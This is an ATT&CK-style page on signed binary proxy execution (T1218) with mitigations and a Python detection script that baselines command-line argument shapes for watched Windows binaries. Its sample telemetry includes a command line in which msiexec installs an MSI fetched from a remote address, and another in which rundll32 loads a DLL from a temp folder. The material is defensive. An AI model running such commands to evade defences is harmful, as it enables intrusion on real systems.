Signed Binary Proxy Execution

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.

ID: T1218
Tactic: Defense Evasion
Platforms: Windows
Permissions Required: Administrator, User
Data Sources: API monitoring, Binary file metadata, DLL monitoring, File monitoring, Loaded DLLs, Process command-line parameters, Process monitoring, Process use of network, Windows Registry
Defense Bypassed: Anti-virus, Application whitelisting, Digital Certificate Validation, Process whitelisting
Contributors: Hans Christoffer Gaardløs; Nishan Maharjan, @loki248; Praetorian
Version: 2.1
Created: 18 April 2018
Last Modified: 29 March 2020

Mitigations

Mitigation Description
Disable or Remove Feature or Program

Many native binaries may not be necessary within a given environment.

Execution Prevention

Consider using application whitelisting to prevent execution of binaries that are susceptible to abuse and not required for a given system or network.

Exploit Protection

Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using trusted binaries to bypass application whitelisting. Note that EMET reached end of life in July 2018; on supported Windows 10 builds the equivalent capability is provided by the Attack Surface Reduction rules in Windows Defender Exploit Guard.

Privileged Account Management

Restrict execution of particularly vulnerable binaries to the privileged accounts or groups that need to use them, to lessen the opportunities for malicious usage.

Detection

Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
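The baseline comparison described above, as an added Python example that is not part of the original page: each invocation of a watched signed binary is reduced to an argument "shape" (switch names kept, values and positional arguments replaced by a coarse category), the shapes are learned from a known-good history, and recent invocations are flagged when their shape has no precedent or when a URL appears on the command line (the msiexec-from-the-Internet case). The log lines are constructed, and every watch-list entry other than msiexec.exe is an assumption to be tuned per environment.

```python
import re
from collections import Counter

# Watch-list of Microsoft-signed binaries that can proxy execution. The page names
# only msiexec.exe; the other entries are assumed here as examples and should be
# tuned to the environment.
WATCHED = {"msiexec.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe"}

URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)
SYSPATH_RE = re.compile(r"^(?:c:\\windows\\|%systemroot%\\|%windir%\\)", re.I)
PATH_RE = re.compile(r"^(?:[a-z]:\\|\\\\|%[a-z_]+%\\|\.{0,2}\\)", re.I)


def split_cmdline(cmdline):
    """Tokenise a Windows command line: quoted runs stay inside one token, quotes are dropped."""
    return [t.replace('"', "") for t in re.findall(r'(?:"[^"]*"|[^\s"])+', cmdline)]


def classify(token):
    """Reduce one argument value to a coarse category so that shapes can be compared."""
    if URL_RE.match(token):
        return "<url>"
    if SYSPATH_RE.match(token):
        return "<syspath>"
    if PATH_RE.match(token):
        return "<path>"
    return "<arg>"


def shape(cmdline):
    """Return (image_name, argument_shape) for a process command line.

    Switch names are kept (lower-cased); switch values and positional arguments
    are replaced by their category, e.g.
      msiexec.exe /I "C:\\Temp\\app.msi" /qn  ->  ('msiexec.exe', '/i <path> /qn')
    """
    tokens = split_cmdline(cmdline)
    if not tokens:
        return None, ""
    image = tokens[0].rsplit("\\", 1)[-1].lower()
    parts = []
    for tok in tokens[1:]:
        if tok[:1] in "/-" and len(tok) > 1:
            # Switch, optionally with a glued value: /i:http://... or /package=C:\x.msi
            m = re.match(r"([/-][^:=]*)(?:[:=](.*))?$", tok)
            name, value = m.group(1).lower(), m.group(2)
            parts.append(name if value is None else f"{name}:{classify(value)}")
        else:
            parts.append(classify(tok))
    return image, " ".join(parts)


def build_baseline(history):
    """Count argument shapes per watched binary from known-good history."""
    baseline = Counter()
    for cmd in history:
        image, sig = shape(cmd)
        if image in WATCHED:
            baseline[(image, sig)] += 1
    return baseline


def review(recent, baseline):
    """Flag watched-binary invocations with no precedent in the baseline, or that
    reference remote content on the command line."""
    findings = []
    for cmd in recent:
        image, sig = shape(cmd)
        if image not in WATCHED:
            continue
        reasons = []
        if "<url>" in sig:
            reasons.append("remote content referenced on the command line")
        if (image, sig) not in baseline:
            reasons.append(f"argument shape never seen in baseline: {sig!r}")
        if reasons:
            findings.append((cmd, reasons))
    return findings


# Constructed sample telemetry (process command lines), not real logs.
HISTORY = [
    r'msiexec.exe /i "C:\Temp\Installer.msi" /qn',
    r"C:\Windows\System32\msiexec.exe /I C:\Users\alice\Downloads\7z.msi /quiet",
    r"msiexec.exe /x {90160000-008C-0000-1000-0000000FF1CE} /qn",
    r"C:\Windows\System32\msiexec.exe /V",
    r"C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,Control_RunDLL",
    r'rundll32.exe "C:\Windows\System32\inetcpl.cpl",ClearMyTracksByProcess 8',
    r"notepad.exe C:\Users\alice\notes.txt",
]
RECENT = [
    r"msiexec.exe /i C:\Temp\Installer.msi /qn",                      # known-good shape
    r"msiexec.exe /q /i http://203.0.113.10/update.msi",              # MSI fetched from the Internet
    r"rundll32.exe C:\Users\bob\AppData\Local\Temp\ab12.dll,Start",   # DLL outside the system directory
    r"C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,Control_RunDLL",
    r"powershell.exe -nop -w hidden",                                 # not on the watch-list
]

if __name__ == "__main__":
    for cmd, reasons in review(RECENT, build_baseline(HISTORY)):
        print(cmd)
        for reason in reasons:
            print("   -", reason)
```

The shape step is what makes the history comparison tolerate benign variation (different installer paths, GUIDs, quoting) while still separating a DLL loaded from a user-writable temp directory from one loaded from System32; the URL check is kept independent of the baseline so it fires even if a remote fetch was once observed as "normal".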

Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.